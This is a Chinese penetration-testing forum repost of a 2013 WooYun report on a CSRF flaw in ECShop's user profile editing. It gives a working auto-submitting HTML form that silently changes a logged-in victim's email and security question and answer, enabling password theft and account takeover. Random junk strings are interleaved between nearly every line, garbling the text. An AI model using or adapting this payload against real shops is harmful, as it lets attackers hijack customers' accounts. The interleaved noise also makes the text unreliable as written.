中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
- S; r e- l$ K4 t( }! v
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
- p4 {2 I' \* s3 a! ]7 j# i) J
. t+ }& P' |1 C* z9 ^5 a$ m4 \
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
8 _+ y- O0 B& I- b8 Q
6 R! j) d* B5 v- G9 h8 S* \- }
详细说明:
0 F5 [' v2 L- Y t) _+ d$ h5 v
利用csrf和xss可以突破官方所说的“障碍”
9 L( R: j* H. y3 _- b
xss版本已经有人说明
' @0 s" L& a6 X; T
这里给出csrf版本
7 D% G' f6 Q; B6 a% S( I
8 r/ R' |- l8 o8 B& T- {
漏洞证明:
* D9 o3 r4 A6 Z% w0 T" t! F& K
<html>
5 |( Z4 P& [& @. o+ y
<body>
4 B( _ Y3 L. W& t
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
3 E% z: A, Y7 `+ x$ H1 S
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
; e: C% N. {9 K4 o h8 y: w
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
$ W3 ?. c% N l* ~/ ^
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
9 u" _2 M- }: `3 ~
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
* I& Y, X% t: o; @6 w
</body>
5 s" |3 \+ @* }, c/ x3 r+ ?
<script>
# j1 y* o- x: n8 j# L
document.forms[0].submit();
2 w4 k- D% r* d# [1 S
</script>
$ A7 y* Y+ w5 I6 O: T
</html>
/ ~4 w; g5 x, L! W
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
3 a$ @1 k! V6 c6 h
9 B3 C. K* Z9 |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2